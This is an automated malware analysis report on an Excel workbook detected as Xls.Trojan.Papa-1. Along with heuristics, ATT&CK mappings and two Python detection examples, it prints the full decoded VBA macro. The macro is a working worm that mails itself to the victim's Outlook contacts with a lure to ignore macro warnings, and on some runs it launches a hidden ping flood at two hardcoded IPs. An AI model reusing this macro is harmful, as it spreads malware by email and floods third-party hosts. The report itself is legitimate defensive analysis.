Verdict: MALICIOUS
Risk score: 320
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1534 Internal Spearphishing
T1498.001 Direct Network Flood
The sample contains a Workbook_Open macro that calls CreateObject("Outlook.Application"), logs on to the MAPI namespace and mails a copy of the open workbook (ActiveWorkbook.FullName) to the first 60 entries of each of the victim's Outlook address lists, with the subject "Fwd: Workbook from all.net and Fred Cohen" and a body telling the recipient to disregard the macro warning. The mailing only runs if the object's default property equals "Outlook", i.e. when Outlook is actually present. After the mailing loop the macro draws a random integer from 0 to 5; if it is 2 or 4 it calls Shell() with vbHide to run ping -t (ping until stopped) against one of two hardcoded IP addresses, 207.222.214.225 or 24.1.84.100, with a random -l payload of up to 60000 bytes and a 1 ms reply timeout. That is a crude ICMP flood of the hardcoded hosts, not a download: ping cannot fetch or execute a second-stage payload, and the macro contains no download or file-write code. The macro's intent is to spread itself by e-mail and, on roughly one run in three, to attack those two hosts. On Error Resume Next and Application.EnableCancelKey = 0 at the top suppress errors and disable Ctrl+Break while it runs.
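The execution chain above (an Office process spawning a hidden, continuous ping) is visible in process-creation telemetry, so here is the hunt a responder would run over it. This is an added example, not part of the analyzer or the report: the records are constructed to resemble Sysmon Event ID 1 fields (ParentImage, Image, CommandLine are Sysmon's names, the values are made up except for the two target IPs from the sample), the OFFICE_PARENTS set and the 1472-byte threshold (largest ICMP echo payload that fits one 1500-byte Ethernet frame) are the example's own choices.

```python
"""
Hunt for Office -> ping.exe -t with an oversized -l payload, the chain the
Papa-style macro above produces.  Added example; sample events are constructed.
"""

# Assumed list of Office hosts worth treating as suspicious ping parents.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Windows ping switches that consume the next token as a value.
PING_VALUE_SWITCHES = {"-l", "-w", "-n", "-i", "-r", "-s", "-j", "-k", "-S", "-v"}
# Largest ICMP echo payload that fits a 1500-byte Ethernet frame (1500-20-8).
ONE_FRAME_PAYLOAD = 1472

# Constructed Sysmon-style process-creation records.  #1 is what the macro
# would produce (Str() puts a space before the random size); #2 is an admin
# ping from cmd.exe; #3 is an Office parent running a single benign ping.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\PING.EXE",
     "CommandLine": "ping -t -l 41983 -w 1 207.222.214.225"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\PING.EXE",
     "CommandLine": "ping -t 10.0.0.1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\PING.EXE",
     "CommandLine": "ping -n 1 10.0.0.5"},
]


def basename(path):
    """Last component of a Windows or POSIX path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_ping(cmdline):
    """Pull the switches that matter for this family out of a Windows ping command line."""
    toks = cmdline.split()
    info = {"continuous": False, "payload": None, "timeout_ms": None, "target": None}
    i = 1  # skip the program token itself
    while i < len(toks):
        t = toks[i]
        if t == "-t":
            info["continuous"] = True
        elif t in PING_VALUE_SWITCHES and i + 1 < len(toks):
            val = toks[i + 1]
            if t == "-l":
                info["payload"] = int(val) if val.isdigit() else None
            elif t == "-w":
                info["timeout_ms"] = int(val) if val.isdigit() else None
            i += 1  # consume the value
        elif not t.startswith("-"):
            info["target"] = t  # last bare token is the host
        i += 1
    return info


def hunt(events):
    """Flag Office-parented continuous pings; one finding per matching event."""
    findings = []
    for ev in events:
        if basename(ev["Image"]) != "ping.exe":
            continue
        if basename(ev["ParentImage"]) not in OFFICE_PARENTS:
            continue
        p = parse_ping(ev["CommandLine"])
        if not p["continuous"]:
            continue  # a one-off ping from a macro is odd, but not this pattern
        payload = p["payload"] or 0
        severity = "critical" if payload > ONE_FRAME_PAYLOAD else "high"
        findings.append({"parent": basename(ev["ParentImage"]),
                         "target": p["target"], "payload": p["payload"],
                         "timeout_ms": p["timeout_ms"], "severity": severity})
    return findings


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

The target and payload fields are what you would feed to an egress block and to a host triage: the -l size over one frame means every echo request fragments, which is why the payload size drives the severity.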
Heuristics (6)
- ClamAV: Xls.Trojan.Papa-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Papa-1
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
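The source-level OLE_VBA_* checks and the p-code fallback above are both simple token rules, and it is useful to see them side by side. The following is an added example, not the analyzer's implementation: the rule IDs are reused only as labels, AUTOEXEC_NAMES and the execution-token list are the example's own choices, and the two inputs are excerpts of the macro source and of the pcodedmp-style listing shown later in this report.

```python
"""
Static triage of a VBA macro: token checks over (a) decoded source and
(b) a p-code listing for when source extraction fails.  Added example.
"""
import re

# Procedure names VBA runs without user interaction (Excel and Word).
AUTOEXEC_NAMES = ("Workbook_Open", "Auto_Open", "Document_Open",
                  "AutoOpen", "AutoExec", "Workbook_Activate")
# p-code call tokens for identifiers that execute code or instantiate objects.
PCODE_EXEC_RE = re.compile(
    r"\b(?:ArgsCall|ArgsLd|ArgsMemCall|ArgsMemLd)\s+"
    r"(Shell|CreateObject|GetObject|ShellExecute|Run|Exec)\b")
SEVERITY_RANK = {"medium": 1, "high": 2, "critical": 3}

# Excerpt of the decoded source (macros.bas) from this report.
SOURCE_EXCERPT = """Private Sub Workbook_Open()
On Error Resume Next
Application.EnableCancelKey = 0
Set oa = CreateObject("Outlook.Application")
Set mn = oa.GetNameSpace("MAPI")
papaver.Subject = "Fwd: Workbook from all.net and Fred Cohen"
papaver.Body = "Urgent info inside. Disregard macro warning."
papaver.Attachments.Add ActiveWorkbook.FullName
papaver.Send
q = Int(6 * Rnd)
If q = 2 Then
Shell "ping -t -l" & Str(Int(60000 * Rnd)) & " -w 1 207.222.214.225", vbHide
ElseIf q = 4 Then
Shell "ping -t -l" & Str(Int(60000 * Rnd)) & " -w 1 24.1.84.100", vbHide
End If
End Sub
"""

# Excerpt of the p-code disassembly from this report (pcodedmp output as comments).
PCODE_EXCERPT = """' Line #0:
' FuncDefn (Private Sub Workbook_Open())
' Line #4:
' LitStr 0x0013 "Outlook.Application"
' ArgsLd CreateObject 0x0001
' Set oa
' Line #27:
' LitStr 0x000A "ping -t -l"
' Ld vbHide
' ArgsCall Shell 0x0002
"""


def scan_vba_source(src):
    """Token checks over decoded source; returns [(rule_id, severity, evidence), ...]."""
    findings = []
    if re.search(r"^\s*(?:Private |Public )?Sub\s+\w+", src, re.M):
        findings.append(("OLE_VBA_MACROS", "medium", "VBA procedure present"))
    for name in AUTOEXEC_NAMES:
        if re.search(r"\bSub\s+%s\b" % name, src):
            findings.append(("OLE_VBA_WBOPEN", "high", name))
    # Shell as a statement or a function call; the lookbehind skips WScript.Shell.
    if re.search(r'(?<![.\w])Shell\b\s*\(?\s*["\w]', src):
        findings.append(("OLE_VBA_SHELL", "critical", "Shell()"))
    for m in re.finditer(r'\bCreateObject\s*\(\s*"([^"]+)"', src):
        findings.append(("OLE_VBA_CREATEOBJ", "high", m.group(1)))
    return findings


def scan_pcode_listing(listing):
    """Auto-exec entry point plus an execution token in the same p-code listing."""
    auto = [n for n in re.findall(r"FuncDefn \((?:Private |Public )?Sub (\w+)", listing)
            if n in AUTOEXEC_NAMES]
    execs = sorted(set(PCODE_EXEC_RE.findall(listing)))
    if auto and execs:
        return [("OLE_VBA_PCODE_AUTOEXEC_EXEC", "high",
                 "%s with %s" % (",".join(auto), ",".join(execs)))]
    return []


def extract_iocs(src):
    """Blockable indicators: hardcoded IPs, ProgIDs, and the lure mail's Subject/Body."""
    return {
        "ips": sorted(set(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", src))),
        "progids": sorted(set(re.findall(r'CreateObject\s*\(\s*"([^"]+)"', src))),
        "mail": dict(re.findall(r'\.(Subject|Body)\s*=\s*"([^"]*)"', src)),
    }


def verdict(findings):
    """Collapse findings to a verdict by their highest severity."""
    if not findings:
        return "clean"
    top = max(SEVERITY_RANK[sev] for _, sev, _ in findings)
    return {1: "suspicious", 2: "likely malicious", 3: "malicious"}[top]


if __name__ == "__main__":
    src_findings = scan_vba_source(SOURCE_EXCERPT)
    for f in src_findings + scan_pcode_listing(PCODE_EXCERPT):
        print("%-32s %-8s %s" % f)
    print("verdict:", verdict(src_findings))
    print("iocs:", extract_iocs(SOURCE_EXCERPT))
```

The p-code scan needs only two token classes (a FuncDefn of an auto-exec name and an Args* call of an execution primitive), which is why it still fires when the source stream has been stripped or olevba cannot decompress it; the source scan adds the ProgID and the mail lure text that the p-code listing shows only as LitStr constants.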
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4469 bytes | e5131945628f13103b106973c21dbcc475e2fc3b2d82da4b3e70f0b4371b10f2 | ClamAV: Xls.Trojan.Papa-1 | unlikely |
Preview script (first 1,000 lines of the extracted script, macros.bas):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
On Error Resume Next
Application.EnableCancelKey = 0
Randomize
Set oa = CreateObject("Outlook.Application")
Set mn = oa.GetNameSpace("MAPI")
If oa = "Outlook" Then
mn.Logon "profile", "password"
For y = 1 To mn.AddressLists.Count
x = 1
Set ab = mn.AddressLists(y)
Set papaver = oa.CreateItem(0)
For z = 1 To ab.AddressEntries.Count
vi = ab.AddressEntries(x)
papaver.Recipients.Add vi
x = x + 1
If x > 60 Then z = ab.AddressEntries.Count
Next z
papaver.Subject = "Fwd: Workbook from all.net and Fred Cohen"
papaver.Body = "Urgent info inside. Disregard macro warning."
papaver.Attachments.Add ActiveWorkbook.FullName
papaver.Send
vi = ""
Next y
mn.Logoff
q = Int(6 * Rnd)
If q = 2 Then
Shell "ping -t -l" & Str(Int(60000 * Rnd)) & " -w 1 207.222.214.225", vbHide
ElseIf q = 4 Then
Shell "ping -t -l" & Str(Int(60000 * Rnd)) & " -w 1 24.1.84.100", vbHide
End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/2570a02638fb43cba9d15893eeafe231.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 2885 bytes
' Line #0:
' FuncDefn (Private Sub Workbook_Open())
' Line #1:
' OnError (Resume Next)
' Line #2:
' LitDI2 0x0000
' Ld Application
' MemSt EnableCancelKey
' Line #3:
' ArgsCall Read 0x0000
' Line #4:
' SetStmt
' LitStr 0x0013 "Outlook.Application"
' ArgsLd CreateObject 0x0001
' Set oa
' Line #5:
' SetStmt
' LitStr 0x0004 "MAPI"
' Ld oa
' ArgsMemLd GetNameSpace 0x0001
' Set mn
' Line #6:
' Ld oa
' LitStr 0x0007 "Outlook"
' Eq
' IfBlock
' Line #7:
' LitStr 0x0007 "profile"
' LitStr 0x0008 "password"
' Ld mn
' ArgsMemCall Logon 0x0002
' Line #8:
' StartForVariable
' Ld y
' EndForVariable
' LitDI2 0x0001
' Ld mn
' MemLd AddressLists
' MemLd Count
' For
' Line #9:
' LitDI2 0x0001
' St x
' Line #10:
' SetStmt
' Ld y
' Ld mn
' ArgsMemLd AddressLists 0x0001
' Set ab
' Line #11:
' SetStmt
' LitDI2 0x0000
' Ld oa
' ArgsMemLd CreateItem 0x0001
' Set papaver
' Line #12:
' StartForVariable
' Ld z
' EndForVariable
' LitDI2 0x0001
' Ld ab
' MemLd AddressEntries
' MemLd Count
' For
' Line #13:
' Ld x
' Ld ab
' ArgsMemLd AddressEntries 0x0001
' St vi
' Line #14:
' Ld vi
' Ld papaver
' MemLd Recipients
' ArgsMemCall Add 0x0001
' Line #15:
' Ld x
' LitDI2 0x0001
' Add
' St x
' Line #16:
' Ld x
' LitDI2 0x003C
' Gt
' If
' BoSImplicit
' Ld ab
' MemLd AddressEntries
' MemLd Count
' St z
' EndIf
' Line #17:
' StartForVariable
' Ld z
' EndForVariable
' NextVar
' Line #18:
' LitStr 0x0029 "Fwd: Workbook from all.net and Fred Cohen"
' Ld papaver
' MemSt Subject
' Line #19:
' LitStr 0x002D "Urgent info inside. Disregard macro warning."
' Ld papaver
' MemSt Body
' Line #20:
' Ld ActiveWorkbook
' MemLd FullName
' Ld papaver
' MemLd Attachments
' ArgsMemCall Add 0x0001
' Line #21:
' Ld papaver
' ArgsMemCall Send 0x0000
' Line #22:
' LitStr 0x0000 ""
' St vi
' Line #23:
' StartForVariable
' Ld y
' EndForVariable
' NextVar
' Line #24:
' Ld mn
' ArgsMemCall Logoff 0x0000
' Line #25:
' LitDI2 0x0006
' Ld Rnd
' Mul
' FnInt
' St q
' Line #26:
' Ld q
' LitDI2 0x0002
' Eq
' IfBlock
' Line #27:
' LitStr 0x000A "ping -t -l"
' LitDI4 0xEA60 0x0000
' Ld Rnd
' Mul
' FnInt
' ArgsLd Str 0x0001
' Concat
' LitStr 0x0015 " -w 1 207.222.214.225"
' Concat
' Ld vbHide
' ArgsCall Shell 0x0002
... (truncated)